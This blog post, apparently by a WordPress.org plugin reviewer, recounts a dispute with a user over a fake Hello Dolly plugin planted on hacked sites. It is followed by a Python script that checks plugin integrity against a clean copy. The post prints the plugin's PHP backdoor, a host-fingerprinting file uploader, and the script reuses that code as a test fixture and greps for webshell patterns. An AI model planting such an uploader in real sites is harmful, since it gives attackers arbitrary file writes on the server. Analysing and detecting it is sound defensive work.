Han (not his real name) emailed the plugin team to complain he was suspended by the forums team.
[…]
But sometime in the last 12 months I had several sites attacked in which a fake version of the Hello Dolly plugin was installed maliciously.
Sadly, as my post was deleted without warning or explanation, any further details I could have given on the subject were lost along with the post.
Now, someone did reply to Han, told him that the fake plugin meant his site had a vulnerability, and explained how he could look into that. Since his forum post included a code snippet, yes, it was removed after he was emailed about it.
If it’s not hosted here, we don’t care
That was, more or less, my mantra. It’s wrong, I very much do care, but I cannot do a blessed thing about other people’s sites.
Still, we looked at the thread, and I was amused by the code:
if(isset($_REQUEST['act'])){
    // Fingerprint the host for whoever triggered the backdoor
    echo '<b>'.php_uname().'</b><br>';
    echo @file_get_contents('/location/server/version').'<br />';
    // Render a file upload form, defaulting the target to the current directory
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
        // Copy the uploaded file to whatever path the request names, errors suppressed
        if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
            echo '<b>Upload success!</b><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
        } else {
            echo '<b>Upload failed!</b>';
        }
    }
    exit;
}
We replied that the code Han found on his server was not hosted on WordPress.org and, therefore, we could do nothing about it, and pointed him at how to clean up a hacked site.
You’re reporting that your sites have a vulnerability and someone is exploiting them. That they happen to use Hello Dolly to hide their malicious code is not something we could prevent. All we can tell you is that something on your sites is insecure and being used as a back door.
Han disagreed:
No, the plugin was faking being Hello Dolly. I don’t use it; that’s how it was discovered. It installed itself and pretended to be Hello Dolly, so yeah, your problem coz it’s pretending to be one of your plugins.
That’s not how it works. I get why Han thought that, and in a way, it is a problem but … what can we do about it?
- We don’t know where the hack is from
- The hacker could have faked any plugin
- Of fucking course they’d fake a well known one people might ignore
I’d love to be able to stop people from faking plugins, but there’s no way to even try.
Fix Your Site
We tried again:
I’m sorry but you are incorrect in your understanding.
The problem is not the Fake Hello Dolly, the problem is SOMETHING ELSE on your sites is vulnerable and that is being used by evil people to install the fake plugin.
They could have named the fake plugin anything. They picked Hello Dolly because it’s common, but there’s nothing anyone can do to make them pick another name.
There’s nothing we can do to help you here.
Stop looking at the fake plugin as the source of your trouble and figure out what OTHER plugin or theme LET IT get installed.
Or hire a security company to help you.
Because, you see, the real issue is that his sites keep getting hacked. So y’know, fix yourself.
Or don’t you think it worth warning users to be aware of a threat that is branding itself as a WordPress product?
I’m not asking you to fix anything. I’m talking about something I found while patching security on someone else’s site. Sure, they could have named it anything. But the code and everything about it was disguised to look a lot like Hello Dolly. All I wanted was to make someone aware, but fine. Thanks, I’ll know not to bother trying to help the community next time.
I see we’ve jumped over to ‘you won’t do what I want so I won’t ever help again’ — a common refrain.
WordPress.org cannot stop people from being assholes
So we tried again:
We understand what you’re trying to do. The reality is that there’s nothing we can do about this.
It’s like people selling a fake Rolex watch. If we knew who it was, we could attempt to stop them. But knowing that it happens ‘somewhere’ out there and that someone fell for it? Well… we’re sorry and it sucks, but there’s nothing we can do about it.
Someone made a fake Hello Dolly and hid bad code in it. They could have picked any plugin, even Yoast SEO, but even then Yoast would tell you there’s nothing they can do either.
Of course Dolly was targeted. It’s on every single install. It’s like targeting Safari on a Mac. Every Mac has it. It’s there. It’s used. Target it.
All you’ve done here is tell us “Hey someone made a fake plugin and hid stuff in it.”
Thank you, but there’s nothing we can do to stop it, and there’s nothing we can do to help people because the real issue isn’t whose plugin was faked, but how did that get installed in the first place. And that’s the job of a site security team.
Unless the fake plugin is being distributed by WordPress.org, or the vulnerability that allowed it to be installed is in a plugin hosted on WordPress.org, this is outside our purview and we cannot assist you.
At that point, Han accepted the point, but bitched we weren’t super kind at the start.
Now here’s where it gets funny.
Han claimed he never got the emails from the forums team, except he did. We know he did because he quoted one in his first email! So, since we knew he’d already been told things (like the plugin team cannot help you on code hosted outside of WordPress.org), we’d skipped that at the start of his email and that pissed him off.
When this was pointed out, he claimed (again) to have not gotten the emails and didn’t know what to do. So we directed him to Slack and he opted to … not.
Points to Remember?
If a plugin is ‘hacked’, it’s likely a different plugin causing it, and you can check because all the code on WordPress.org is open source and free to view. You can go look and say “Hmm, my copy of Hello Dolly doesn’t match!” That means the issue is not with the code hosted on WordPress.org; it’s something else!
If it’s code you bought elsewhere, again, don’t complain to the Plugin Review Team, they can’t do jack.
If it’s code you got from a nulled site, well you’re an idiot and don’t do that again.
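The “does my copy match?” check above can be automated. The script below is an added example, not code from the post or from WordPress.org: it assumes you have already downloaded and unpacked a clean copy of the plugin from WordPress.org into one directory, hashes every file in both that copy and the installed plugin directory, reports what was modified, removed or added, and then greps the suspect files for the idioms seen in the uploader quoted earlier (`$_FILES[`, `@copy(`, `php_uname(`) plus two widely seen webshell patterns. The clean and tampered plugin trees it builds for the demo are constructed stand-ins, not the real Hello Dolly source.

```python
"""Compare an installed WordPress plugin against a known-good copy.

Added example, not from the original post. Assumes a clean copy of the
plugin (e.g. the zip from WordPress.org, unpacked) is available on disk.
"""
import hashlib
import os
import re
import tempfile

# Patterns drawn from the uploader quoted in the post, plus two common webshell
# idioms. A match is a lead for a human to read, not proof of compromise.
INDICATORS = [
    r"\$_FILES\[",             # handles an uploaded file
    r"@copy\(",                # silently copies it somewhere
    r"php_uname\(",            # fingerprints the host
    r"move_uploaded_file\(",
    r"eval\s*\(\s*base64_decode",
]


def sha256_of(path):
    """Stream a file through sha256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's path (relative to root, '/'-separated) to its sha256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


def compare(reference, installed):
    """Files that differ from, are missing from, or were added to the clean copy."""
    return {
        "modified": sorted(p for p in reference if p in installed and installed[p] != reference[p]),
        "missing": sorted(p for p in reference if p not in installed),
        "unexpected": sorted(p for p in installed if p not in reference),
    }


def scan_indicators(path):
    """Return the INDICATORS patterns that occur in the given file."""
    with open(path, "r", errors="replace") as f:
        text = f.read()
    return [pat for pat in INDICATORS if re.search(pat, text)]


def verify_plugin(clean_dir, installed_dir):
    """Full report: hash comparison plus indicator scan of every suspect file."""
    report = compare(build_manifest(clean_dir), build_manifest(installed_dir))
    suspects = report["modified"] + report["unexpected"]
    report["indicators"] = {
        p: scan_indicators(os.path.join(installed_dir, p)) for p in suspects
    }
    return report


# Constructed stand-ins: a placeholder "clean" plugin file (not the real Hello
# Dolly source) and the shape of the uploader quoted in the post.
CLEAN_PHP = "<?php\n/* Plugin Name: Hello Dolly */\nfunction hello_dolly() { echo 'Hello, Dolly'; }\n"
UPLOADER = (
    "if(isset($_REQUEST['act'])){\n"
    "    echo '<b>'.php_uname().'</b>';\n"
    "    @copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name']);\n"
    "}\n"
)


def write(root, rel, content):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(content)


def demo():
    """Build a clean tree and a tampered install under a temp dir, then verify."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = os.path.join(tmp, "clean", "hello-dolly")
        inst = os.path.join(tmp, "installed", "hello-dolly")
        write(clean, "hello.php", CLEAN_PHP)
        write(clean, "readme.txt", "=== Hello Dolly ===\n")
        write(inst, "hello.php", CLEAN_PHP + UPLOADER)        # backdoor appended to a real file
        write(inst, "readme.txt", "=== Hello Dolly ===\n")    # untouched
        write(inst, "inc/cache.php", "<?php\n" + UPLOADER)    # extra file dropped alongside
        return verify_plugin(clean, inst)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

In practice you would point `verify_plugin` at the unpacked WordPress.org download and at `wp-content/plugins/<slug>` on the server; a mismatch tells you the hosted code is not what is running, and the indicator list tells you which of the changed files to read first. It does not tell you how the file got there, which is the question the post says actually matters.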